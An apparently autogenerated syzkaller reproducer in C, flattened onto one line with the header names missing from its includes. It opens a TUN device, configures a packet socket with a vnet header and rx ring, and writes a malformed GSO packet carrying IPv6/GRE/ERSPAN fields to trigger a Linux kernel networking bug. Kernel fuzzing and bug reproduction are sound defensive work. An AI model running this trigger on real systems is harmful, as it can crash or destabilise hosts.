// autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // openat$tun arguments: [ // fd: const = 0xffffffffffffff9c (8 bytes) // file: ptr[in, buffer] { // buffer: {2f 64 65 76 2f 6e 65 74 2f 74 75 6e 00} (length 0xd) // } // flags: open_flags = 0x40241 (4 bytes) // mode: const = 0x0 (2 bytes) // ] // returns fd_tun memcpy((void*)0x200000000000, "/dev/net/tun\000", 13); res = syscall( __NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x200000000000ul, /*flags=O_TRUNC|O_NOATIME|O_CREAT|O_WRONLY*/ 0x40241, /*mode=*/0); if (res != -1) r[0] = res; // ioctl$TUNSETIFF arguments: [ // fd: fd_tun (resource) // cmd: const = 0x400454ca (4 bytes) // arg: ptr[in, ifreq_dev_t[devnames, flags[tun_setiff_flags, int16]]] { // ifreq_dev_t[devnames, flags[tun_setiff_flags, int16]] { // ifr_ifrn: buffer: {73 79 7a 6b 61 6c 6c 65 72 31 00 00 00 00 00 00} // (length 0x10) elem: tun_setiff_flags = 0xc201 (2 bytes) pad = 0x0 // (22 bytes) // } // } // ] memcpy((void*)0x200000000200, "syzkaller1\000\000\000\000\000\000", 16); *(uint16_t*)0x200000000210 = 0xc201; syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x400454ca, /*arg=*/0x200000000200ul); // socket$kcm arguments: [ // domain: const = 0x2 (8 bytes) // type: kcm_socket_type = 0xa (8 bytes) // proto: const = 0x2 (4 bytes) // ] // returns sock_kcm res = syscall(__NR_socket, /*domain=*/2ul, /*type=SOCK_DGRAM|0x8*/ 0xaul, /*proto=*/2); if (res != -1) r[1] = res; // ioctl$SIOCSIFHWADDR arguments: [ // fd: fd_tun (resource) // cmd: const = 0x8914 (4 bytes) // arg: ptr[in, ifreq_dev_t[devnames, mac_addr]] { // ifreq_dev_t[devnames, mac_addr] { // ifr_ifrn: buffer: {73 79 7a 6b 61 6c 6c 65 72 31 00 00 00 00 00 00} // (length 0x10) elem: union mac_addr { // link_local: mac_addr_link_local { // a0: const = 0x1 (1 bytes) // a1: const = 0x80 (1 bytes) // a2: const = 0xc2 (1 bytes) // a3: const = 0x0 (1 bytes) // a4: const = 0x0 (1 bytes) // a5: mac_addr_link_local_values = 0xe (1 bytes) // } // } // pad = 0x0 (18 bytes) // } // } // ] memcpy((void*)0x200000000180, "syzkaller1\000\000\000\000\000\000", 16); *(uint8_t*)0x200000000190 = 1; *(uint8_t*)0x200000000191 = 0x80; *(uint8_t*)0x200000000192 = 0xc2; *(uint8_t*)0x200000000193 = 0; *(uint8_t*)0x200000000194 = 0; *(uint8_t*)0x200000000195 = 0xe; syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0x8914, /*arg=*/0x200000000180ul); // socket$packet arguments: [ // domain: const = 0x11 (8 bytes) // type: packet_socket_type = 0x3 (8 bytes) // proto: const = 0x300 (4 bytes) // ] // returns sock_packet res = syscall(__NR_socket, /*domain=*/0x11ul, /*type=SOCK_RAW*/ 3ul, /*proto=*/0x300); if (res != -1) r[2] = res; // setsockopt$packet_int arguments: [ // fd: sock_packet (resource) // level: const = 0x107 (4 bytes) // optname: packet_option_types_int = 0xf (4 bytes) // optval: ptr[in, int32] { // int32 = 0x2 (4 bytes) // } // optlen: len = 0x4 (8 bytes) // ] *(uint32_t*)0x200000000240 = 2; syscall(__NR_setsockopt, /*fd=*/r[2], /*level=*/0x107, /*optname=PACKET_VNET_HDR*/ 0xf, /*optval=*/0x200000000240ul, /*optlen=*/4ul); // setsockopt$packet_rx_ring arguments: [ // fd: sock_packet (resource) // level: const = 0x107 (4 bytes) // optname: const = 0x5 (4 bytes) // optval: ptr[in, tpacket_req_u] { // union tpacket_req_u { // req3: tpacket_req3 { // tp_block_size: int32 = 0x1000 (4 bytes) // tp_block_nr: int32 = 0x3a (4 bytes) // tp_frame_size: int32 = 0x1000 (4 bytes) // tp_frame_nr: int32 = 0x3a (4 bytes) // tp_retire_blk_tov: int32 = 0x0 (4 bytes) // tp_sizeof_priv: int32 = 0x0 (4 bytes) // tp_feature_req_word: int32 = 0x0 (4 bytes) // } // } // } // optlen: len = 0x1c (8 bytes) // ] *(uint32_t*)0x200000000040 = 0x1000; *(uint32_t*)0x200000000044 = 0x3a; *(uint32_t*)0x200000000048 = 0x1000; *(uint32_t*)0x20000000004c = 0x3a; *(uint32_t*)0x200000000050 = 0; *(uint32_t*)0x200000000054 = 0; *(uint32_t*)0x200000000058 = 0; syscall(__NR_setsockopt, /*fd=*/r[2], /*level=*/0x107, /*optname=*/5, /*optval=*/0x200000000040ul, /*optlen=*/0x1cul); // write$tun arguments: [ // fd: fd_tun (resource) // buf: ptr[in, tun_buffer] { // tun_buffer { // pi: union optional[tun_pi] { // val: tun_pi { // flags: const = 0x0 (2 bytes) // proto: ether_types = 0x86dd (2 bytes) // } // } // hdr: union optional[virtio_net_hdr] { // val: virtio_net_hdr { // flags: virtio_net_flags = 0x0 (1 bytes) // gsotype: virtio_net_types = 0x1 (1 bytes) // hdrlen: int16 = 0x11 (2 bytes) // gsosize: int16 = 0x4 (2 bytes) // start: int16 = 0x0 (2 bytes) // offset: int16 = 0xca6 (2 bytes) // } // } // data: union tun_payload { // mpls: mpls_packet { // labels: array[mpls_label] { // } // payload: union mpls_payload { // ipv6: union ipv6_packet { // gre_packet: ipv6_packet_t[const[IPPROTO_GRE, int8], // gre_packet] { // priority: int8 = 0xe (0 bytes) // version: const = 0x6 (1 bytes) // flow_label: buffer: {ec 00 be} (length 0x3) // length: len = 0x44 (2 bytes) // next_header: const = 0x2f (1 bytes) // hop_limit: hop_limits = 0xff (1 bytes) // src_ip: union ipv6_addr { // local: ipv6_addr_t[const[0xaa, int8]] { // a0: const = 0xfe (1 bytes) // a1: const = 0x80 (1 bytes) // a2: buffer: {00 00 00 00 00 00 00 00 00 00 00 00 00} // (length 0xd) a3: const = 0xaa (1 bytes) // } // } // dst_ip: union ipv6_addr { // mcast2: ipv6_addr_multicast2 { // a0: const = 0xff (1 bytes) // a1: const = 0x2 (1 bytes) // a2: buffer: {00 00 00 00 00 00 00 00 00 00 00 00 00} // (length 0xd) a3: const = 0x1 (1 bytes) // } // } // payload: ipv6_packet_payload[gre_packet] { // ext_headers: array[ipv6_ext_header] { // } // payload: gre_packet { // pptp: gre_packet_pptp { // C: const = 0x0 (0 bytes) // R: const = 0x0 (0 bytes) // K: const = 0x1 (0 bytes) // S: int16 = 0x0 (0 bytes) // reserved: const = 0x0 (1 bytes) // A: int16 = 0x0 (0 bytes) // flags: const = 0x0 (0 bytes) // version: const = 0x1 (1 bytes) // protocol: const = 0x88be (2 bytes) // payload_len: bytesize = 0x0 (2 bytes) // key_call_id: int16be = 0x3 (2 bytes) // add: array[int16be] { // } // payload: buffer: {} (length 0x0) // } // cisco_ipv4: gre_packet_cisco[ETH_P_IP, array[int8]] { // C: int16 = 0x0 (0 bytes) // R: const = 0x0 (0 bytes) // K: int16 = 0x1 (0 bytes) // S: int16 = 0x1 (0 bytes) // reserved: const = 0x0 (1 bytes) // version: const = 0x0 (1 bytes) // protocol: const = 0x800 (2 bytes) // add: array[int16be] { // } // payload: buffer: {} (length 0x0) // } // cisco_ipv6: gre_packet_cisco[ETH_P_IPV6, array[int8]] // { // C: int16 = 0x1 (0 bytes) // R: const = 0x0 (0 bytes) // K: int16 = 0x1 (0 bytes) // S: int16 = 0x0 (0 bytes) // reserved: const = 0x0 (1 bytes) // version: const = 0x0 (1 bytes) // protocol: const = 0x86dd (2 bytes) // add: array[int16be] { // } // payload: buffer: {} (length 0x0) // } // erspan1: gre_packet_erspan[ETH_P_ERSPAN, // erspan_md1_msg] { // H: const = 0xa888 (2 bytes) // protocol: const = 0x88be (2 bytes) // seq: int32be = 0x2 (4 bytes) // payload: erspan_md1_msg { // base: erspan_base_hdr[1] { // vlan_upper: int8 = 0x6 (0 bytes) // ver: const = 0x1 (1 bytes) // vlan: int8 = 0x9 (1 bytes) // session_id_upper: int8 = 0x2 (0 bytes) // t: int8 = 0x1 (0 bytes) // en: int8 = 0x0 (0 bytes) // cos: int8 = 0x3 (1 bytes) // session_id: int8 = 0x5 (1 bytes) // } // version: const = 0x1 (4 bytes) // payload: erspan_md1 { // index: int32be = 0x88a8 (4 bytes) // } // } // } // erspan2: gre_packet_erspan[ETH_P_ERSPAN2, // erspan_md2_msg] { // H: const = 0x8 (2 bytes) // protocol: const = 0x22eb (2 bytes) // seq: int32be = 0x20000 (4 bytes) // payload: erspan_md2_msg { // base: erspan_base_hdr[2] { // vlan_upper: int8 = 0x0 (0 bytes) // ver: const = 0x2 (1 bytes) // vlan: int8 = 0xc (1 bytes) // session_id_upper: int8 = 0x0 (0 bytes) // t: int8 = 0x0 (0 bytes) // en: int8 = 0x2 (0 bytes) // cos: int8 = 0x7 (1 bytes) // session_id: int8 = 0x8 (1 bytes) // } // version: const = 0x2 (4 bytes) // payload: erspan_md2 { // timestamp: int32be = 0x2 (4 bytes) // sgt: int16be = 0x4 (2 bytes) // hwid_upper: int8 = 0x0 (0 bytes) // ft: int8 = 0x5 (0 bytes) // p: int8 = 0x1 (1 bytes) // o: int8 = 0x1 (0 bytes) // gra: int8 = 0x1 (0 bytes) // dir: int8 = 0x0 (0 bytes) // hwid: int8 = 0x0 (1 bytes) // } // } // } // teb: gre_packet_erspan[ETH_P_TEB, array[int8]] { // H: const = 0x8 (2 bytes) // protocol: const = 0x6558 (2 bytes) // seq: int32be = 0x2 (4 bytes) // payload: buffer: {} (length 0x0) // } // } // } // } // } // } // } // } // } // } // count: len = 0xfdef (8 bytes) // ] *(uint16_t*)0x2000000002c0 = 0; *(uint16_t*)0x2000000002c2 = htobe16(0x86dd); *(uint8_t*)0x2000000002c4 = 0; *(uint8_t*)0x2000000002c5 = 1; *(uint16_t*)0x2000000002c6 = 0x11; *(uint16_t*)0x2000000002c8 = 4; *(uint16_t*)0x2000000002ca = 0; *(uint16_t*)0x2000000002cc = 0xca6; STORE_BY_BITMASK(uint8_t, , 0x2000000002ce, 0xe, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x2000000002ce, 6, 4, 4); memcpy((void*)0x2000000002cf, "\xec\x00\xbe", 3); *(uint16_t*)0x2000000002d2 = htobe16(0x44); *(uint8_t*)0x2000000002d4 = 0x2f; *(uint8_t*)0x2000000002d5 = -1; *(uint8_t*)0x2000000002d6 = 0xfe; *(uint8_t*)0x2000000002d7 = 0x80; memset((void*)0x2000000002d8, 0, 13); *(uint8_t*)0x2000000002e5 = 0xaa; *(uint8_t*)0x2000000002e6 = -1; *(uint8_t*)0x2000000002e7 = 2; memset((void*)0x2000000002e8, 0, 13); *(uint8_t*)0x2000000002f5 = 1; STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 0, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 1, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 1, 2, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 3, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 4, 4); STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 0, 0, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 0, 1, 4); STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 1, 5, 3); *(uint16_t*)0x2000000002f8 = htobe16(0x88be); *(uint16_t*)0x2000000002fa = htobe16(0); *(uint16_t*)0x2000000002fc = htobe16(3); STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 0, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 1, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 1, 2, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 1, 3, 1); STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 4, 9); STORE_BY_BITMASK(uint16_t, , 0x2000000002ff, 0, 5, 3); *(uint16_t*)0x200000000300 = htobe16(0x800); STORE_BY_BITMASK(uint16_t, , 0x200000000302, 1, 0, 1); STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 1, 1); STORE_BY_BITMASK(uint16_t, , 0x200000000302, 1, 2, 1); STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 3, 1); STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 4, 9); STORE_BY_BITMASK(uint16_t, , 0x200000000303, 0, 5, 3); *(uint16_t*)0x200000000304 = htobe16(0x86dd); *(uint16_t*)0x200000000306 = 0xa888; *(uint16_t*)0x200000000308 = htobe16(0x88be); *(uint32_t*)0x20000000030a = htobe32(2); STORE_BY_BITMASK(uint8_t, , 0x20000000030e, 6, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000000030e, 1, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000000030f, 9, 0, 8); STORE_BY_BITMASK(uint8_t, , 0x200000000310, 2, 0, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000310, 1, 2, 1); STORE_BY_BITMASK(uint8_t, , 0x200000000310, 0, 3, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000310, 3, 5, 3); STORE_BY_BITMASK(uint8_t, , 0x200000000311, 5, 0, 8); *(uint32_t*)0x200000000312 = 1; *(uint32_t*)0x200000000316 = htobe32(0x88a8); *(uint16_t*)0x20000000031a = 8; *(uint16_t*)0x20000000031c = htobe16(0x22eb); *(uint32_t*)0x20000000031e = htobe32(0x20000); STORE_BY_BITMASK(uint8_t, , 0x200000000322, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200000000322, 2, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200000000323, 0xc, 0, 8); STORE_BY_BITMASK(uint8_t, , 0x200000000324, 0, 0, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000324, 0, 2, 1); STORE_BY_BITMASK(uint8_t, , 0x200000000324, 2, 3, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000324, 7, 5, 3); STORE_BY_BITMASK(uint8_t, , 0x200000000325, 8, 0, 8); *(uint32_t*)0x200000000326 = 2; *(uint32_t*)0x20000000032a = htobe32(2); *(uint16_t*)0x20000000032e = htobe16(4); STORE_BY_BITMASK(uint8_t, , 0x200000000330, 0, 0, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000330, 5, 2, 5); STORE_BY_BITMASK(uint8_t, , 0x200000000330, 1, 7, 1); STORE_BY_BITMASK(uint8_t, , 0x200000000331, 1, 0, 1); STORE_BY_BITMASK(uint8_t, , 0x200000000331, 1, 1, 2); STORE_BY_BITMASK(uint8_t, , 0x200000000331, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200000000331, 0, 4, 1); *(uint16_t*)0x200000000332 = 8; *(uint16_t*)0x200000000334 = htobe16(0x6558); *(uint32_t*)0x200000000336 = htobe32(2); syscall(__NR_write, /*fd=*/r[0], /*buf=*/0x2000000002c0ul, /*count=*/0xfdeful); return 0; }